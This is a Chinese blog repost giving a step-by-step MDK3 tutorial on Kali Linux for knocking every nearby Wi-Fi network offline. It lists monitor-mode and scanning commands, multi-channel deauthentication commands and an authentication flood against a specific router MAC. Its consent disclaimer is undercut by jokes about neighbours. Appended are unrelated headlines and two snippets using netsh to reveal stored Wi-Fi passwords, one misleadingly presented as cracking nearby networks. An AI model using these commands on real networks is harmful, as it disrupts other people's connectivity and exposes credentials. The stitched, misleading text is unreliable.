來源 | CSDN博客
在如今 Wi-Fi已經是我們每個人日常生活中都必不可少的東西,但是在Wi-Fi如此大范圍的普及之下,Wi-Fi真的安全嗎?
答案是否定的。我們利用kali Linux系統中的插件MDK3可以輕而易舉的就可以使周圍的Wi-Fi全部癱瘓!
本文所有測試均經過同意,請勿用于非法用途,未經作者授權禁止轉載!!!
了解什么是MDK3
MDK3是一款在很早之前已經出現的一款無線網絡測試工具,攻擊模式多種多樣,個人認為其中最殘忍最有效的攻擊手段便是MDK3的斷網攻擊,發起攻擊之后,所有已連接Wi-Fi的客戶端全部掉線,并且當客戶端重新連接Wi-Fi的時候,即使輸入正確的密碼,Wi-Fi也會顯示密碼錯誤,從而達到癱瘓效果。
什么是kali Linux
Kali Linux是一個高級滲透測試和安全審計Linux發行版。
如果你聽到一個 13 歲的“黑客”吹噓他是多么的牛逼,是有可能的,因為有 Kali Linux 的存在。盡管有可能會被稱為“腳本小子”,但是事實上,Kali 仍舊是安全專家手頭的重要工具。相信大名鼎鼎的Kali大家都有了解,由于篇幅問題這里就不進行過多介紹了。
由于篇幅問題大家可以自行搜索如何在電腦中安裝kali linux系統,非常的簡單。
準備工作
1.筆記本電腦(需安裝kali linux系統)
2.監聽網卡(很容易就可以買到 價格很便宜 幾十塊錢)
3.兩條跑的很快的腿
4.止血藥、紗布等
尋找目標準備進攻
要想使用MDK3進行斷網攻擊需要先將網卡開啟監聽模式。
首先我們打開的kali命令終端 然后輸入 ifconfig 查看存在哪些網卡。
然后插入我們的USB無線網卡 。
注;插入無線網卡會默認連接到Windows系統上,想讓你的網卡連接至虛擬機 需要進行下圖操作。
進行上圖操作之后,我們再次輸入 ifconfig 來查看網卡是否連接到了虛擬機。
好的,我們從截圖中可以看出 我們多了一個wlan0的無線網卡,這說明我們的無線網卡連接虛擬機成功。
我們繼續輸入命令 airmon-ng start wlan0 來啟動我們的網卡 。
之后再次輸入 ifconfig 查看監聽模式是否開啟成功。
好的 從截圖中我們可以看出,我們的lwlan0網卡變成了wlan0mon 這說明我們的監聽模式開啟成功 。
然后我們輸入 airodump-ng wlan0mon 來掃描周圍的目標。
這里只需要記住Wi-Fi所占用的信道就好。
(可以將信道理解為高速公路,Wi-Fi就像汽車,每輛車只能走一條高速公路,一共有十三個信道)
安裝MDK3開始攻擊
在命令終端輸入 apt-get install mdk3 安裝mdk3插件(已安裝的跳過此步驟)然后一路回車 。
安裝完畢之后,我們在命令終端輸入 mdk3 wlan0mon d -c 1
(這條代碼的意思為:對信道為1所有的Wi-Fi發起斷網攻擊)
如果想要對多條信道發起斷網攻擊可以輸入 mdk3 wlan0mon d -c 1,2,3,4,5,6,7,8,9,10,11 但我是不建議你這么做的,因為畢竟挨打很疼,而且本次測試是經過鄰居們的“同意”的 希望小伙伴們不要做違反法律的事。
檢驗攻擊效果
在發起攻擊之后,我輸入的是正確的密碼,但是卻顯示密碼錯誤無法連接Wi-Fi,攻擊成功!!
拓展玩法,對單個Wi-Fi發起攻擊
如果我們只想對單個Wi-Fi進行攻擊,我們輸入mdk3 wlan0mon0 a -a 6C:E8:73:7A:35:A8 發動洪水攻擊。
一分鐘左右可以使路由器下所有客戶端掉線,7分鐘左右可使路由器直接宕機當場暴斃 。
總結
MDK3是一個非常好用的插件,玩法多種多樣,還可以設置白名單之類的。如果小伙伴們有興趣的話我可以出一期全面介紹MDK3的文章 !
無線網絡我們每天都要用,但實際上他的安全系數是非常低的 大部分路由器都可以被非常簡單的方法宕甚至有的路由器還有萬能管理員密碼。
好的,本期教程就到這里。如果有什么問題或者建議歡迎大家在評論區指出。
原文鏈接:
https://blog.csdn.net/weixin_46220666/article/details/105031467
?十六位頂尖專家齊聚,解密阿里云最新核心技術競爭力!
?華為回應美新規:不涉及產品買賣;微軟 GitHub 帳戶疑被黑;GCC 10.1 發布 | 極客頭條
?微服務太雜亂難以管理?一站式服務治理平臺來襲!
?干貨 | 時間序列預測類問題下的建模方案探索實踐
?利用 Docker 在不同宿主機做 CentOS 系統容器 | 原力計劃
?從貨幣歷史,看可編程貨幣的升級
你忘記網絡的時候,想要連接附近wifi,卻不知道密碼多少?怎么連接了其實可以破解一下,就知道密碼是多少?然后就可以連接上了,小編就告訴你們!
1、鍵盤上按win+R彈出框內輸入cmd
2、然后命令行內輸入netsh wlan show profiles 回車,這樣就可以看到附近所有wifi了。
3、最后再重新輸入上面的代碼后面加多“WiFi名字” key=clear 回車即可;關鍵內容就是WiFi的密碼了
如:netsh wlan show profiles "408專屬光纖" key=clear
快來試試吧!
嘍~
各位小伙伴今天小冰教大家一個程序員才會的技能,有沒有要上車的!
相信各位小伙伴在日常的生活中會遇到過忘記自家WiFi密碼的情況吧!遇到這種情況百分之99的人都應該會對WiFi密碼進行修改,不過密碼修改次數越多越容易忘記,小冰今天早上在某論壇看到了兩行查看WiFi密碼的代碼,現在分享給大家。只需要簡單的三步就可以完成哦!而且每個人都可以學會,超級簡單。
1.按下win+R輸入cmd后回車;
2. 進入cmd界面后輸入WiFi名稱的代碼:
netsh wlan show profiles
3. 輸入獲取密碼的代碼,name后引號中內容請替換為需要獲取密碼的WiFi名稱。
netsh wlan show profile name="0627" key=clear
用鼠標滾輪下滑就可以成功看到WiFi的密碼了,怎么樣是不是很簡單呢?
據說會使用代碼的人會變得更帥哦!
有沒有人要試試。